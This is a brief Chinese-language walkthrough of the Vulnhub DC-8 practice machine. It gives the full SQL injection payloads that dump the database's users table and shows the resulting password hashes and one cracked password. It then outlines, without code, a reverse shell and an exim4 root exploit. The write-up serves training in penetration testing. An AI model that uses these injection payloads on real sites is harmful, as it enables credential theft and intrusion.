
Vulnhub DC 8

扫描主机
扫描端口
扫描目录
访问页面

?nid=1、?nid=2、?nid=3 都有回显，这可能有点玩意，试试 sql 注入。
?nid=1 or 1=1-- 有回显（回显随注入条件变化，说明 nid 很可能被直接拼接进 SQL 语句，没有做参数化处理）
?nid=-1 order by 1-- 有回显
order by 2 报错，说明查询只返回一列，只有一个回显位置

爆库
?nid=-1 union select database()--
得到库名（即下文使用的 d7db）

爆表名：users
?nid=-1 union select group_concat(table_name) from information_schema.tables where table_schema='d7db'

爆列名：name、pass
?nid=-1 union select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='d7db'

爆字段值
?nid=-1 union select group_concat(name) from users
?nid=-1 union select group_concat(pass) from users

账号：admin, john
密码：
$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

破解 john 的密码：turtle

登录网站后台，直接插入反弹 shell
kali 监听
在下面的页面随便输入并提交，触发反弹

找到没见过的 exim4，找下有没有漏洞利用
查看 exim4 版本
把利用脚本上传到目标机
直接运行报错，查看脚本
-m setuid 没成功
-m netcat 成功，拿到 root